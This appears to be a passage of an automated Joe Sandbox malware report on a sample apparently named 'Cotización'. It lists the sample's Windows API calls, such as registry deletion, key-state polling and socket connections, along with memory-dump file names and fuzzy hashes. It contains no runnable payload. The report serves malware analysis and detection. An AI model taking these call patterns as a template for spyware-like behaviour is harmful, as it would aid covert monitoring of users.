                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                APIs
                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: ConnectRegistry_memmove_wcslen
                • String ID:
                • API String ID: 15295421-0
                • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                APIs
                • GetCursorPos.USER32(?), ref: 004563A6
                • ScreenToClient.USER32(?,?), ref: 004563C3
                • GetAsyncKeyState.USER32(?), ref: 00456400
                • GetAsyncKeyState.USER32(?), ref: 00456410
                • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: AsyncState$ClientCursorLongScreenWindow
                • String ID:
                • API String ID: 3539004672-0
                • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                APIs
                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                • Sleep.KERNEL32(0000000A), ref: 0047D455
                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Interlocked$DecrementIncrement$Sleep
                • String ID:
                • API String ID: 327565842-0
                • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                APIs
                • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: PrivateProfile$SectionWrite$String
                • String ID:
                • API String ID: 2832842796-0
                • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                APIs
                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Enum$CloseDeleteOpen
                • String ID:
                • API String ID: 2095303065-0
                • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                APIs
                • GetWindowRect.USER32(?,?), ref: 00436A24
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: RectWindow
                • String ID:
                • API String ID: 861336768-0
                • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                APIs
                • SendMessageW.USER32 ref: 00449598
                  • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                • _wcslen.LIBCMT ref: 0044960D
                • _wcslen.LIBCMT ref: 0044961A
                • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: MessageSend$_wcslen$_wcspbrk
                • String ID:
                • API String ID: 1856069659-0
                • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                APIs
                • GetCursorPos.USER32(?), ref: 004478E2
                • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                • GetCursorPos.USER32(00000000), ref: 0044796A
                • TrackPopupMenuEx.USER32(02F86490,00000000,00000000,?,?,00000000), ref: 00447991
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: CursorMenuPopupTrack$Proc
                • String ID:
                • API String ID: 1300944170-0
                • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                APIs
                • GetClientRect.USER32(?,?), ref: 004479CC
                • GetCursorPos.USER32(?), ref: 004479D7
                • ScreenToClient.USER32(?,?), ref: 004479F3
                • WindowFromPoint.USER32(?,?), ref: 00447A34
                • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Client$CursorFromPointProcRectScreenWindow
                • String ID:
                • API String ID: 1822080540-0
                • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                APIs
                • GetWindowRect.USER32(?,?), ref: 00447C5D
                • ScreenToClient.USER32(?,?), ref: 00447C7B
                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                • EndPaint.USER32(?,?), ref: 00447D13
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: ClientPaintRectRectangleScreenViewportWindow
                • String ID:
                • API String ID: 659298297-0
                • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                APIs
                • EnableWindow.USER32(?,00000000), ref: 00448B5C
                • EnableWindow.USER32(?,00000001), ref: 00448B72
                • ShowWindow.USER32(?,00000000), ref: 00448BE8
                • ShowWindow.USER32(?,00000004), ref: 00448BF4
                • EnableWindow.USER32(?,00000001), ref: 00448C09
                  • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                  • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                  • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                  • Part of subcall function 00440D98: SendMessageW.USER32(02F81AC0,000000F1,00000000,00000000), ref: 00440E6E
                  • Part of subcall function 00440D98: SendMessageW.USER32(02F81AC0,000000F1,00000001,00000000), ref: 00440E9A
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Window$EnableMessageSend$LongShow
                • String ID:
                • API String ID: 142311417-0
                • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                APIs
                • IsWindowVisible.USER32(?), ref: 00445879
                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                • _wcslen.LIBCMT ref: 004458FB
                • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                • String ID:
                • API String ID: 3087257052-0
                • Opcode ID: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                • Opcode Fuzzy Hash: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                APIs
                  • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: ErrorLast$closesocketconnectinet_addrsocket
                • String ID:
                • API String ID: 245547762-0
                • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                APIs
                • DeleteObject.GDI32(00000000), ref: 004471D8
                • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                • SelectObject.GDI32(?,00000000), ref: 00447228
                • BeginPath.GDI32(?), ref: 0044723D
                • SelectObject.GDI32(?,00000000), ref: 00447266
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Object$Select$BeginCreateDeletePath
                • String ID:
                • API String ID: 2338827641-0
                • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                APIs
                • Sleep.KERNEL32(00000000), ref: 00434598
                • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                • Sleep.KERNEL32(00000000), ref: 004345D4
                • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                Memory Dump Source
